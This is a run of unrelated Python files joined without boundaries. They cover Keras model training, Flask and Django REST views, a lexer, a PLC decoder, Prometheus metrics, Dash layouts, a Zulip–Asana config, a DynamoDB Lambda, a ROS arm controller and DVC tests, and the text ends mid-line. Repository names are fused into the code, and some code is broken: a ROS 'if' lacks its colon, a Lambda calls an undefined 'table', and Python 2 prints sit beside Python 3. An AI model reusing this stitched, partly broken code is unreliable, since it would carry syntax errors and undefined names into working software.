Layers #output_layer1 = layers.Dense(50, activation="relu")(pooling_layer) #output_layer1 = layers.Dropout(0.25)(output_layer1) #output_layer2 = layers.Dense(1, activation="sigmoid")(output_layer1) model.add(Dense(50, activation="relu")) model.add(Dropout(0.25)) model.add(Dense(36, activation="sigmoid")) #36 # Compile the model #model = models.Model(inputs=input_layer, outputs=output_layer2) model.compile(optimizer='adam', loss='binary_crossentropy', metrics=['accuracy']) return model epochs = 5 batch_size = 64 model = create_rcnn(train_seq_x) history = model.fit(train_seq_x, y_train, epochs=epochs, batch_size=batch_size, validation_data=(valid_seq_x, y_test)) plt.title('Loss') plt.plot(history.history['loss'], label='train') plt.plot(history.history['val_loss'], label='test') plt.legend() plt.show() y_pred = model.predict(valid_seq_x) y_pred = np.round(y_pred) #y_pred[y_pred>=0.3] = 1 #y_pred[y_pred<0.3] = 0 y_pred = pd.DataFrame(data=y_pred, columns=y_test.columns) y_pred.reset_index(inplace=True, drop=True) display_results(y_test.reset_index(drop=True), y_pred) recall, occurance, labels = check_recall(y_train, y_test.reset_index(drop=True), y_pred) fig,ax = plt.subplots(nrows=2, sharex=True) ax[0].bar(x=range(len(recall)), height=recall) ax[1].bar(x=range(len(recall)), height=occurance) ax[1].set_xticks(range(len(labels))) ax[1].set_xticklabels(labels, rotation=90) fig.tight_layout()SubjeBilisim/predictorsrc/predictor/dto/intraday_dto.py from datetime import datetime from decimal import Decimal from typing import NoReturn class IntradayDTO: def __init__(self, date: datetime, o: Decimal, high: Decimal, low: Decimal, close: Decimal, volume: Decimal, symbol: str) -> NoReturn: self.date: datetime = date self.open: Decimal = o self.high: Decimal = high self.low: Decimal = low self.close: Decimal = close self.volume: Decimal = volume self.symbol: str = symbol 1-10 from flask import abort, jsonify, request, g from application.misc.query_wrapper import QueryWrapper from application.auth.required import auth_required class JobTargetTemplate(QueryWrapper): decorators = [auth_required] # Jobs are bound to a user, so we must authenticate def get(self): job_id = request.args.get('job_id') if job_id is None: abort(400, "Job ID not specified") user_id = g.user.id response = self._processor_get( job_id=job_id, user_id=user_id ) return jsonify(response) import re import sys def lex(characters, token_exprs): pos = 0 tokens = [] while pos < len(characters): match = None for token_expr in token_exprs: pattern, tag = token_expr regex = re.compile(pattern) match = regex.match(characters, pos) if match: text = match.group(0) if tag: token = (text, tag) tokens.append(token) break if not match: sys.stderr.write( f"Got exception while compiling code:\n" f" SyntaxException at colomn {pos}:\n" f" Unknown character: '{characters[pos]}'.\n" ) sys.exit(1) else: pos = match.end(0) return tokens a = 4+3j print hasattr(a, 'imag') print getattr(a, 'real') def b(): pass setattr(b, 'foo', -1) print b.foo from cNodeList import * cNodeDict={} while(True): print("Enter First Point") source = input() print("Enter Second Point") destination = input() print("Enter Value") value = input() # For Avoiding Duplicate Values sKey = source.upper() dKey = destination.upper() if sKey not in cNodeDict: sNode = CNode(source) cNodeDict.update({source.upper(): sNode}) else: sNode = cNodeDict.get(sKey) if dKey not in cNodeDict: dNode = insertNewNode(sNode, destination, value) cNodeDict.update({destination.upper(): dNode}) else: addNextNode(sNode,cNodeDict.get(dKey),value) print("Enter more? [y//n]") choice = input() if choice.lower() == "n": break #Traversing currentNode = cNodeDict.get("A") print(currentNode.nextNodeList) for item in currentNode.nextNodeList: print("Name " + item[0].name) print("Value " + item[1]) for subItem in item[0].nextNodeList: print(subItem) #!/usr/bin/env python3 # coding: utf-8 # Copyright (c) 2019-2020 Latona. All rights reserved. from .jtekt_decoder import JtektPlcDataMulti ADDR_SIZE = 2 DATA_SIZE = 1 class PlcData(JtektPlcDataMulti): def __init__(self, req, res): super().__init__(req, res) def to_array(self): addr_num = int(len(self.head_binary)/ADDR_SIZE) array_list = [] for i in range(addr_num): bit_value = self.binary[i*DATA_SIZE:(i+1)*DATA_SIZE] array_list.append({ "Bit": int(bit_value.hex(), 16), }) return array_list @staticmethod def generate_binary(data): body_bytes = b'' for row in data: array_no = row.get("ArrayNo") bit = int(row.get("Bit")) if array_no is not None and bit is not None: body_bytes += bytes.fromhex(array_no)[::-1] body_bytes += bit.to_bytes(1, 'little') return body_bytes from prometheus_client import CollectorRegistry, generate_latest, start_http_server, Summary, Counter, Histogram, Gauge from timeit import default_timer __version__ = "1.0.1" prometheus_monitor_registry = CollectorRegistry() class prometheus_monitor(object): _instances = {} def __new__(cls, labels: dict, name: str): if name in cls._instances: return cls._instances[name] instance = super().__new__(cls) instance._labels = labels instance._name = name instance._counter = Counter('%s_counter' % instance._name, instance._name, list(instance._labels.keys())) instance._summary = Summary('%s_summary' % instance._name, instance._name, list(instance._labels.keys())) prometheus_monitor_registry.register(instance._counter) prometheus_monitor_registry.register(instance._summary) cls._instances[name] = instance return instance def __enter__(self, *args, **kwargs): self._counter.labels(*list(self._labels.values())).inc() self._start = default_timer() def __exit__(self, *args, **kwargs): self._summary.labels(*list(self._labels.values())).observe(max(default_timer() - self._start, 0)) # Interface for decorator def __call__(self, function, *args): def wrapped_function(*args): with self: return function(*args) return wrapped_function JohnDoee/wampire from ..utils import URIPattern def test_uri_pattern_no_duplicate(): pattern = URIPattern(False) pattern_s1_p1 = pattern.register_uri("testsession1", "a1.b2.c3.d4.e55", "exact") pattern_s2_p1 = pattern.register_uri("testsession2", "a1.b2.c3", "prefix") pattern_s3_p1 = pattern.register_uri("testsession3", "a1.b2.c3.d4", "prefix") pattern_s4_p1 = pattern.register_uri("testsession4", "a1.b2..d4.e5", "wildcard") pattern_s5_p1 = pattern.register_uri("testsession5", "a1.b2.c33..e5", "wildcard") pattern_s6_p1 = pattern.register_uri("testsession6", "a1.b2..d4.e5..g7", "wildcard") pattern_s7_p1 = pattern.register_uri("testsession7", "a1.b2..d4..f6.g7", "wildcard") assert pattern.match_uri("a1.b2.c3.d4.e55") == ("testsession1", pattern_s1_p1) assert pattern.match_uri("a1.b2.c3.d98.e74") == ("testsession2", pattern_s2_p1) assert pattern.match_uri("a1.b2.c3.d4.e325") == ("testsession3", pattern_s3_p1) assert pattern.match_uri("a1.b2.c55.d4.e5") == ("testsession4", pattern_s4_p1) assert pattern.match_uri("a1.b2.c33.d4.e5") == ("testsession5", pattern_s5_p1) assert pattern.match_uri("a1.b2.c88.d4.e5.f6.g7") == ("testsession6", pattern_s6_p1) assert pattern.match_uri("a2.b2.c2.d2.e2") is None assert not pattern.register_uri("testsession10", "a1.b2.c3.d4.e55", "exact") def test_uri_pattern_duplicate(): pattern = URIPattern(True) pattern_s1_p1 = pattern.register_uri("testsession1", "a1.b2.c3.d4.e55", "exact") pattern_s2_p1 = pattern.register_uri("testsession2", "a1.b2.c3", "prefix") pattern_s3_p1 = pattern.register_uri("testsession3", "a1.b2..d4.e5", "wildcard") pattern_s4_p1 = pattern.register_uri("testsession4", "a1.b2..d4.e5..g7", "wildcard") assert sorted(pattern.match_uri("a1.b2.c3.d4.e55")) == [ ("testsession1", pattern_s1_p1), ("testsession2", pattern_s2_p1), ] assert sorted(pattern.match_uri("a1.b2.c55.d4.e5")) == [ ("testsession3", pattern_s3_p1) ] assert sorted(pattern.match_uri("a1.b2.c3.d4.e5")) == [ ("testsession2", pattern_s2_p1), ("testsession3", pattern_s3_p1), ] assert sorted(pattern.match_uri("a2.b2.c2.d2.e2")) == [] def test_uri_unregister(): pattern = URIPattern(True) pattern_s1_p1 = pattern.register_uri("testsession1", "a1.b2.c3.d4.e55", "exact") pattern_s1_p2 = pattern.register_uri("testsession1", "a1.b2.c3.d4.e56", "exact") pattern_s1_p3 = pattern.register_uri("testsession1", "a1.b2.c3", "prefix") pattern_s2_p1 = pattern.register_uri("testsession2", "a1.b2.c3.d4.e56", "exact") pattern_s2_p2 = pattern.register_uri("testsession2", "a1.b2.c3.d4", "prefix") assert pattern.unregister_uri("testsession1", pattern_s1_p1) assert sorted(pattern.match_uri("a1.b2.c3.d4.e55")) == [ ("testsession1", pattern_s1_p3), ("testsession2", pattern_s2_p2), ] assert pattern.unregister_session("testsession1") assert sorted(pattern.match_uri("a1.b2.c3.d4.e55")) == [ ("testsession2", pattern_s2_p2) ] assert pattern.unregister_session("testsession2") from datetime import datetime as dt import tools.functions as functions import plotly.graph_objs as go import dash_core_components as dcc import dash_html_components as html def get_layout(): layout = html.Div([ html.Div([ html.H1(children='TypeTracker', style={'text-align': 'center', 'font': 'helvetica', 'color': '#327DFF'}), # Date Selector html.Div([ html.H4(children='Pick the date'), dcc.DatePickerRange( id='date-picker-range', start_date=dt.now(), end_date=dt.now() ), html.Div([ html.Button(id='date-submit-button', n_clicks=0, children='Submit') ], style={'padding': '10px'}), html.Div(id='selected-date') ], style={'width': '49%', 'display': 'inline-block', 'text-align': 'center', 'vertical-align': 'text-top'}), # Time Selector html.Div([ html.H4(children='Pick the time range'), html.Div([ dcc.RangeSlider( id='time_slider', count=1, min=0, max=23*60+59, step=1, value=[0, 23*60+59] )]), html.Button(id='time-submit-button', n_clicks=0, children='Submit'), html.Div(id='selected-time') ], style={'width': '49%', 'display': 'inline-block', 'text-align': 'center', 'vertical-align': 'text-top'}), # Tabs html.Div([ dcc.Tabs(id="tabs", value='summary-tab', children=[ dcc.Tab(label='Summary', value='summary-tab'), dcc.Tab(label='CPM graph', value='cpm-tab'), dcc.Tab(label='Character use', value='character-use-tab'), ]), html.Div(id='tabs-content') ]) ]) ]) return layout def create_summary_section_cpm(data): return 'Average typing speed: {: .2f} Characters Per Minute.'.format( functions.get_average_typing_speed_overall(data.get_data_within_time())) def create_summary_section_device_percentage(data): mouse, keyboard = functions.get_percentage_usage_of_mouse_keyboard(data.get_data_within_time()) return 'Usage of keyboard: {keyboard}%.\n'\ 'Usage of mouse: {mouse}%.'.format(keyboard=keyboard, mouse=mouse) def create_typing_timeseries(data, axist_type=[], title=[]): x, y = functions.get_typing_speed_over_time(data.get_data_within_time()) return{ 'data': [go.Scatter( x=x, y=y, mode='lines+markers' )], 'layout': { 'xaxis': {'title': 'Time'}, 'yaxis': {'title': 'CPM'} } } def create_character_barchart(data, axist_type=[], title=[]): x, y = functions.get_character_sum(data.get_data_within_time()) return{ 'data': [go.Bar( x=x, y=y, text=x, textposition='auto', marker=dict( color='rgb(158,202,225)', line=dict( color='rgb(8,48,107)', width=1.5), ), opacity=0.6 )], 'layout': { 'xaxis': {'title': 'Character / function', 'showticklabels': False}, 'yaxis': {'title': 'Usage'} } } def update_data_date_ranges(data, start_date, end_date): start_date = dt.strptime(str(start_date.split()[0]), '%Y-%m-%d') end_date = dt.strptime(str(end_date.split()[0]), '%Y-%m-%d') data.set_data_ranges(start_date, end_date) return u'Selected date range: {start} - {end}'.format(start=str(start_date).split()[0], end=str(end_date).split()[0]) def update_data_time_ranges(data, value): data.set_time_ranges(time_from=value[0], time_to=value[1]) return u'Analysis between {}:{} and {}:{}'.format(int(value[0]/60), int(value[0] % 60), int(value[1]/60), int(value[1] % 60)) def tab_render(tab): if tab == 'summary-tab': return html.Div([ html.H3(children='Summary'), html.Div(id='typing-speed-summary'), html.Div(id='device-usage-summary'), html.Button(id='refresh', n_clicks=0, children='Refresh'), ], style={'text-align': 'center'}) elif tab == 'cpm-tab': return html.Div([ html.H4(children='Typing speed in CPM over time.'), dcc.Graph( id='typing-speed-timeseries', ), html.Button(id='refresh', n_clicks=0, children='Refresh') ], style={'text-align': 'center'}) elif tab == 'character-use-tab': return html.Div([ html.H4(children='Character use within selected time.'), html.Div([ dcc.Graph( id='character-use' ) ]), html.Button(id='refresh', n_clicks=0, children='Refresh') ], style={'text-align': 'center'}) kevindice/cnap-dms1-10 from django.contrib.auth.models import User, Group from rest_framework import viewsets from rest_framework.permissions import IsAuthenticated, AllowAny from rest_framework.response import Response from rest_framework.decorators import action from .serializers import full, basic, anon_create from .permissions import IsTargetUserOrHasPerm, IsNotAllowed class UserViewSet(viewsets.ModelViewSet): permission_classes = (IsAuthenticated, ) queryset = User.objects.all().order_by('-date_joined') serializer_class = basic.UserSerializer http_method_names = ['get', 'post', 'put', 'patch', 'head', 'options'] def get_permissions(self): """ - Anyone can create a user and view available methods - Updates require permission or ownership - Retrieval requires authentication - Deletion is not allowed """ if self.action in ['create', 'metadata'] \ or self.request.method in ['OPTIONS']: return AllowAny(), elif self.action in ['update', 'partial_update']: return IsTargetUserOrHasPerm(), elif self.action in ['retrieve', 'list', 'me'] \ or self.request.method in ['HEAD']: return IsAuthenticated(), else: # 'delete' not allowed return IsNotAllowed(), def get_serializer_class(self): """ - Limit signup fields for anonymous - Expose all fields to privileged users - Limit signup fields for non-privileged users - Stripped down for everyone else """ if self.request.user.is_anonymous: return anon_create.UserSerializer elif 'profile.can_view_full_profiles_of_others' \ in self.request.user.get_all_permissions(): return full.UserSerializer elif self.action == 'create': return anon_create.UserSerializer elif self.detail: obj = self.get_object() if obj == self.request.user: return full.UserSerializer return basic.UserSerializer @action(methods=['head', 'get'], detail=False) def me(self, request): """ Convenience method to return a user's own profile """ return Response( full.UserSerializer( self.request.user, context={'request': request} ).data ) class GroupViewSet(viewsets.ModelViewSet): queryset = Group.objects.all() serializer_class = full.GroupSerializer http_method_names = ['get', 'head', 'options'] def get_permissions(self): if self.action in ['retrieve', 'list', 'metadata'] \ or self.request.method in ['HEAD', 'OPTIONS']: return IsAuthenticated(), return IsNotAllowed(), from __future__ import unicode_literals from .about import __version__ from .spacy_cld import LanguageDetector xsect/calc/cruciform.py from __future__ import division from .angle import angle_points from .multi import multi_section_summary __all__ = ['cruciform_points', 'cruciform_summary'] def cruciform_points(leg1, leg2, thickness1, thickness2=None, separation=0): """ Returns an array of cruciform boundary points of shape (N, 2). Parameters ---------- leg1 : float The length of the legs in the vertical direction. leg2 : float The length of the legs in the horizontal direction. thickness1 : float The thickness of `leg1`. thickness2 : float The thickness of `leg2`. If None, the thickness is assumed the same as `thickness1`. separation : float The separation distance between connected legs. """ a = angle_points(leg1, leg2, thickness1, thickness2) a += (0.5*separation, 0.5*separation) b = a * (-1, 1) c = a * (1, -1) d = a * (-1, -1) return a, b, c, d def cruciform_summary(leg1, leg2, thickness1, thickness2=None, separation=0): """ Returns a dictionary with a summary of cruciform properties. Parameters ---------- leg1 : float The length of the legs in the vertical direction. leg2 : float The length of the legs in the horizontal direction. thickness1 : float The thickness of `leg1`. thickness2 : float The thickness of `leg2`. If None, the thickness is assumed the same as `thickness1`. separation : float The separation distance between connected legs. """ p = cruciform_points(leg1, leg2, thickness1, thickness2, separation) return multi_section_summary(p) # MIT License # Copyright (c) 2019 haoxintong """""" import os import unittest from mxnet.gluon.data import DataLoader from gluonar.data import * class TransformAudio: DTYPES = ("float32", "float16") def __init__(self, audio_length, dtype="float32"): self.audio_length = int(audio_length) if dtype not in self.DTYPES: raise ValueError("Dtype other than float32/16 is not supported.") self.dtype = dtype def train(self, data, label): data = data.astype(self.dtype) data = random_crop(data, self.audio_length) return data, label def val(self, data): data = data.astype(self.dtype) data = center_crop(data, self.audio_length) return data class TestVoxAudioValFolderDataset(unittest.TestCase): def setUp(self) -> None: self.data_root = os.path.expanduser("~/data/vox") trans = TransformAudio(48000) self.dataset = VoxAudioValFolderDataset(os.path.join(self.data_root, "sampled_pairs.txt"), root=os.path.join(self.data_root, "train1"), transform=trans.val) self.data_loader = DataLoader(self.dataset, 8, num_workers=4) def test_get_audio(self): for i, data in enumerate(self.dataset): audio0, audio1 = data[0] self.assertEqual(audio0.shape[0], audio1.shape[0], "{}th audio pairs got different shape!".format(i)) if i > 10: break def test_data_loader(self): for i, batch in enumerate(self.data_loader): data_pairs = batch[0] self.assertEqual(data_pairs[0].shape, data_pairs[1].shape, "Shape not equal in a batch.") if i > 10: break DLBasics_Utilities/__init__.py from . import DLBasics_Utilities from .DLBasics_Utilities import File_Helper #!/usr/bin/env python # -*- coding: utf-8 -*- # # Copyright © 2014 Zulip, Inc. # # Permission is hereby granted, free of charge, to any person obtaining a copy # of this software and associated documentation files (the "Software"), to deal # in the Software without restriction, including without limitation the rights # to use, copy, modify, merge, publish, distribute, sublicense, and/or sell # copies of the Software, and to permit persons to whom the Software is # furnished to do so, subject to the following conditions: # # The above copyright notice and this permission notice shall be included in # all copies or substantial portions of the Software. # # THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR # IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, # FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE # AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER # LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, # OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN # THE SOFTWARE. ### REQUIRED CONFIGURATION ### # Change these values to your Asana credentials. ASANA_API_KEY = "" # Change these values to the credentials for your Asana bot. ZULIP_USER = "" ZULIP_API_KEY = "" # The Zulip stream that will receive Asana task updates. ZULIP_STREAM_NAME = "asana" ### OPTIONAL CONFIGURATION ### # Set to None for logging to stdout when testing, and to a file for # logging in production. #LOG_FILE = "/var/tmp/zulip_asana.log" LOG_FILE = None # This file is used to resume this mirror in case the script shuts down. # It is required and needs to be writeable. RESUME_FILE = "/var/tmp/zulip_asana.state" # When initially started, how many hours of messages to include. ASANA_INITIAL_HISTORY_HOURS = 1 # Set this to your Zulip API server URI ZULIP_SITE = "https://api.zulip.com" # If properly installed, the Zulip API should be in your import # path, but if not, set a custom path below ZULIP_API_PATH = None from adia.lazyattr import LazyAttribute def test_lazyattribute(): global callcount class MyType: pass my_instance = MyType() callcount = 0 class Foo: @LazyAttribute def bar(self): """Foo bar baz.""" global callcount callcount += 1 return my_instance assert 'Foo bar baz.' == Foo.bar.__doc__ assert 'bar' == Foo.bar.__name__ foo = Foo() assert my_instance is foo.bar assert 1 == callcount import json import boto3 import sys import logging import traceback from time import time from decimal import Decimal from boto3.dynamodb.conditions import Attr from DecimalEncoder import DecimalEncoder logger = logging.getLogger() logger.setLevel(logging.INFO) dynamodb = boto3.resource('dynamodb', region_name='eu-west-1') home_table = dynamodb.Table('temperature_humidity_data') def get_home_data(event, context): out = { 'statusCode': 200 } try: # get dates from body if event['body'] is not None: body = json.loads(event['body']) else: body = {} logger.info(body) # if there are not dates in body set to 1 week time_now = int(time()) date_start = body['date_start'] if 'date_start' in body else (time_now - 604800) date_end = body['date_end'] if 'date_end' in body else time_now # scan table for that dates using pagination to get all data response = home_table.scan( FilterExpression=Attr('timestamp').gte(date_start) & Attr('timestamp').lte(date_end) ) home_data = response['Items'] while 'LastEvaluatedKey' in response: response = table.scan(FilterExpression=Attr('timestamp').gte(date_start) & Attr('timestamp').lte(date_end), ExclusiveStartKey=response['LastEvaluatedKey']) home_data.extend(response['Items']) out['body'] = json.dumps(home_data, cls=DecimalEncoder) except Exception as exp: exception_type, exception_value, exception_traceback = sys.exc_info() traceback_string = traceback.format_exception(exception_type, exception_value, exception_traceback) err_msg = json.dumps({ "errorType": exception_type.__name__, "errorMessage": str(exception_value), "stackTrace": traceback_string }) logger.error(err_msg) out['statusCode'] = 404 out['body'] = 'Something went wrong' return outsid-dey/arm_planning1-10 #!/usr/bin/env python import copy import actionlib import rospy import numpy as np #import pcl from math import sin, cos from moveit_python import (MoveGroupInterface, PlanningSceneInterface, PickPlaceInterface) from moveit_msgs.msg import PlaceLocation, MoveItErrorCodes from geometry_msgs.msg import TwistStamped, PoseStamped from std_msgs.msg import Int8, Float32 from sensor_msgs.msg import JointState from control_msgs.msg import FollowJointTrajectoryAction, FollowJointTrajectoryGoal from control_msgs.msg import GripperCommandAction, GripperCommandGoal from moveit_msgs.msg import PlaceLocation, MoveItErrorCodes from trajectory_msgs.msg import JointTrajectory, JointTrajectoryPoint import moveit_commander DES_JOINTS_TOPIC = "/fetch/des_states" NO_DOF = 7 class FollowTrajectoryClient(object): def __init__(self, name, joint_names): self.trajectory = JointTrajectory() self.sub_des_states = rospy.Subscriber(DES_JOINTS_TOPIC, JointTrajectory, self.handle_des_states, tcp_nodelay=True, queue_size=1) self.client = actionlib.SimpleActionClient("%s/follow_joint_trajectory" % name, FollowJointTrajectoryAction) rospy.loginfo("Waiting for %s..." % name) self.client.wait_for_server() # self.joint_names = joint_names self.trajectory = JointTrajectory() self.trajectory.joint_names = joint_names self.trajectory.points[0].positions = np.zeros(NO_DOF) self.trajectory.points[0].velocities = np.zeros(NO_DOF) self.trajectory.points[0].time_from_start = rospy.Duration(2.0) self.move_to() # set up flag for new trajectory received self.new_trajectory_received_flag = False def handle_des_states(self, data): self.trajectory.points = data.points # self.trajectory.joint_names = self.joint_names self.new_trajectory_received_flag = True def move_to(self): follow_goal = FollowJointTrajectoryGoal() follow_goal.trajectory = self.trajectory self.new_trajectory_received_flag = False self.client.send_goal(follow_goal) self.client.wait_for_result() if __name__ == "__main__": # Create a node rospy.init_node("fetch_planning_interface") # Make sure sim time is working while not rospy.Time.now(): pass # Setup clients arm_action = FollowTrajectoryClient("arm_controller", ["shoulder_pan_joint", "shoulder_lift_joint", \ "upperarm_roll_joint", "elbow_flex_joint", \ "forearm_roll_joint", "wrist_flex_joint", \ "wrist_roll_joint"]) rospy.loginfo("Moving the arm with position commands") while not rospy.is_shutdown(): if arm_action.new_trajectory_received_flag arm_action.move_to() shape_generator/__init__.py from .helpers import channel_end, combine_input_files, csv, to_xs_dict, deg2slope, Circle, Slope, Vertical from .shape_generator import CrossSection from .shape_generator_holding import CrossSectionHolding from .converter_swmm_api import convert_shape_generator_to_curve tests/func/test_repro.py import filecmp import getpass import os import posixpath import re import shutil import uuid from pathlib import Path from subprocess import PIPE, Popen from unittest import SkipTest from urllib.parse import urljoin import boto3 import paramiko import pytest from flaky.flaky_decorator import flaky from google.cloud import storage as gc from mock import patch from dvc.dvcfile import DVC_FILE, Dvcfile from dvc.exceptions import ( CyclicGraphError, ReproductionError, StagePathAsOutputError, ) from dvc.main import main from dvc.output.base import BaseOutput from dvc.path_info import URLInfo from dvc.remote.local import LocalRemote from dvc.repo import Repo as DvcRepo from dvc.stage import Stage from dvc.stage.exceptions import StageFileDoesNotExistError from dvc.system import System from dvc.utils import file_md5, relpath from dvc.utils.fs import remove from dvc.utils.stage import dump_stage_file, load_stage_file from tests.basic_env import TestDvc from tests.remotes import ( GCP, HDFS, S3, SSH, TEST_AWS_REPO_BUCKET, TEST_GCP_REPO_BUCKET, Local, SSHMocked, ) from tests.utils.httpd import ContentMD5Handler, StaticFileServer class SingleStageRun: def _run(self, **kwargs): kwargs["single_stage"] = True kwargs.pop("name", None) return self.dvc.run(**kwargs) @staticmethod def _get_stage_target(stage): return stage.addressing class TestRepro(SingleStageRun, TestDvc): def setUp(self): super().setUp() stages = self.dvc.add(self.FOO) self.assertEqual(len(stages), 1) self.foo_stage = stages[0] self.assertTrue(self.foo_stage is not None) self.file1 = "file1" self.file1_stage = self.file1 + ".dvc" self.stage = self._run( fname=self.file1_stage, outs=[self.file1], deps=[self.FOO, self.CODE], cmd=f"python {self.CODE} {self.FOO} {self.file1}", name="run1", ) class TestReproFail(TestRepro): def test(self): os.unlink(self.CODE) ret = main(["repro", self._get_stage_target(self.stage)]) self.assertNotEqual(ret, 0) class TestReproCyclicGraph(SingleStageRun, TestDvc): def test(self): self._run( deps=[self.FOO], outs=["bar.txt"], cmd="echo bar > bar.txt", name="copybarbar-txt", ) self._run( deps=["bar.txt"], outs=["baz.txt"], cmd="echo baz > baz.txt", name="copybazbaz-txt", ) stage_dump = { "cmd": "echo baz > foo", "deps": [{"path": "baz.txt"}], "outs": [{"path": self.FOO}], } dump_stage_file("cycle.dvc", stage_dump) with self.assertRaises(CyclicGraphError): self.dvc.reproduce("cycle.dvc") class TestReproWorkingDirectoryAsOutput(TestDvc): """ | stage.cwd | out.path | cwd as output | |:-----------:|:---------:|:-------------:| | dir | dir | True | | dir/subdir/ | dir | True | | dir | dir-1 | False | | . | something | False | """ def test(self): # File structure: # . # |-- dir1 # | |__ dir2.dvc (out.path == ../dir2) # |__ dir2 # |__ something.dvc (stage.cwd == ./dir2) os.mkdir(os.path.join(self.dvc.root_dir, "dir1")) self.dvc.run( fname=os.path.join("dir1", "dir2.dvc"), wdir="dir1", outs=[os.path.join("..", "dir2")], cmd="mkdir {path}".format(path=os.path.join("..", "dir2")), single_stage=True, ) faulty_stage_path = os.path.join("dir2", "something.dvc") output = os.path.join("..", "something") stage_dump = { "cmd": f"echo something > {output}", "outs": [{"path": output}], } dump_stage_file(faulty_stage_path, stage_dump) with self.assertRaises(StagePathAsOutputError): self.dvc.reproduce(faulty_stage_path) def test_nested(self): # . # |-- a # | |__ nested # | |__ dir # | |__ error.dvc (stage.cwd == 'a/nested/dir') # |__ b # |__ nested.dvc (stage.out == 'a/nested') dir1 = "b" dir2 = "a" os.mkdir(dir1) os.mkdir(dir2) nested_dir = os.path.join(dir2, "nested") out_dir = relpath(nested_dir, dir1) nested_stage = self.dvc.run( fname=os.path.join(dir1, "b.dvc"), wdir=dir1, outs=[out_dir], # ../a/nested cmd=f"mkdir {out_dir}", single_stage=True, ) os.mkdir(os.path.join(nested_dir, "dir")) error_stage_path = os.path.join(nested_dir, "dir", "error.dvc") output = os.path.join("..", "..", "something") stage_dump = { "cmd": f"echo something > {output}", "outs": [{"path": output}], } dump_stage_file(error_stage_path, stage_dump) # NOTE: os.walk() walks in a sorted order and we need dir2 subdirs to # be processed before dir1 to load error.dvc first. self.dvc.stages = [ nested_stage, Dvcfile(self.dvc, error_stage_path).stage, ] with patch.object(self.dvc, "_reset"): # to prevent `stages` resetting with self.assertRaises(StagePathAsOutputError): self.dvc.reproduce(error_stage_path) def test_similar_paths(self): # File structure: # # . # |-- something.dvc (out.path == something) # |-- something # |__ something-1 # |-- a # |__ a.dvc (stage.cwd == something-1) self.dvc.run( outs=["something"], cmd="mkdir something", single_stage=True ) os.mkdir("something-1") stage = os.path.join("something-1", "a.dvc") stage_dump = {"cmd": "echo a > a", "outs": [{"path": "a"}]} dump_stage_file(stage, stage_dump) try: self.dvc.reproduce(stage) except StagePathAsOutputError: self.fail("should not raise StagePathAsOutputError") class TestReproDepUnderDir(SingleStageRun, TestDvc): def test(self): stages = self.dvc.add(self.DATA_DIR) self.assertEqual(len(stages), 1) self.dir_stage = stages[0] self.assertTrue(self.dir_stage is not None) self.file1 = "file1" stage = self._run( fname=self.file1 + ".dvc", outs=[self.file1], deps=[self.DATA, self.CODE], cmd=f"python {self.CODE} {self.DATA} {self.file1}", name="copy-data-file1", ) self.assertTrue(filecmp.cmp(self.file1, self.DATA, shallow=False)) os.unlink(self.DATA) shutil.copyfile(self.FOO, self.DATA) stages = self.dvc.reproduce(self._get_stage_target(stage)) self.assertEqual(len(stages), 2) self.assertTrue(filecmp.cmp(self.file1, self.FOO, shallow=False)) class TestReproDepDirWithOutputsUnderIt(SingleStageRun, TestDvc): def test(self): stages = self.dvc.add(self.DATA) self.assertEqual(len(stages), 1) self.assertTrue(stages[0] is not None) stages = self.dvc.add(self.DATA_SUB) self.assertEqual(len(stages), 1) self.assertTrue(stages[0] is not None) deps = [self.DATA, self.DATA_SUB] stage = self.dvc.run( cmd="ls {}".format(" ".join(deps)), fname="dvcfile2.dvc", deps=deps, single_stage=True, ) self.assertTrue(stage is not None) file1 = "file1" file1_stage = file1 + ".dvc" stage = self._run( fname=file1_stage, deps=[self.DATA_DIR], outs=[file1], cmd=f"python {self.CODE} {self.DATA} {file1}", name="copy-data-file1", ) self.assertTrue(stage is not None) os.unlink(self.DATA) shutil.copyfile(self.FOO, self.DATA) stages = self.dvc.reproduce(self._get_stage_target(stage)) self.assertEqual(len(stages), 2) class TestReproNoDeps(TestRepro): def test(self): out = "out" code_file = "out.py" stage_file = "out.dvc" code = ( 'import uuid\nwith open("{}", "w+") as fd:\n' "\tfd.write(str(uuid.uuid4()))\n".format(out) ) with open(code_file, "w+") as fd: fd.write(code) stage = self._run( fname=stage_file, outs=[out], cmd=f"python {code_file}", name="uuid", ) stages = self.dvc.reproduce(self._get_stage_target(stage)) self.assertEqual(len(stages), 1) class TestReproForce(TestRepro): def test(self): stages = self.dvc.reproduce( self._get_stage_target(self.stage), force=True ) self.assertEqual(len(stages), 2) class TestReproChangedCode(TestRepro): def test(self): self.swap_code() stages = self.dvc.reproduce(self._get_stage_target(self.stage)) self.assertTrue(filecmp.cmp(self.file1, self.BAR, shallow=False)) self.assertEqual(len(stages), 1) def swap_code(self): os.unlink(self.CODE) new_contents = self.CODE_CONTENTS new_contents += "\nshutil.copyfile('{}', " "sys.argv[2])\n".format( self.BAR ) self.create(self.CODE, new_contents) class TestReproChangedData(TestRepro): def test(self): self.swap_foo_with_bar() stages = self.dvc.reproduce(self._get_stage_target(self.stage)) self.assertTrue(filecmp.cmp(self.file1, self.BAR, shallow=False)) self.assertEqual(len(stages), 2) def swap_foo_with_bar(self): os.unlink(self.FOO) shutil.copyfile(self.BAR, self.FOO) class TestReproDry(TestReproChangedData): def test(self): self.swap_foo_with_bar() stages = self.dvc.reproduce( self._get_stage_target(self.stage), dry=True ) self.assertTrue(len(stages), 2) self.assertFalse(filecmp.cmp(self.file1, self.BAR, shallow=False)) ret = main(["repro", "--dry", self._get_stage_target(self.stage)]) self.assertEqual(ret, 0) self.assertFalse(filecmp.cmp(self.file1, self.BAR, shallow=False)) class TestReproUpToDate(TestRepro): def test(self): ret = main(["repro", self._get_stage_target(self.stage)]) self.assertEqual(ret, 0) class TestReproDryNoExec(TestDvc): def test(self): deps = [] for d in range(3): idir = f"idir{d}" odir = f"odir{d}" deps.append("-d") deps.append(odir) os.mkdir(idir) f = os.path.join(idir, "file") with open(f, "w+") as fobj: fobj.write(str(d)) ret = main( [ "run", "--no-exec", "--single-stage", "-d", idir, "-o", odir, "python -c 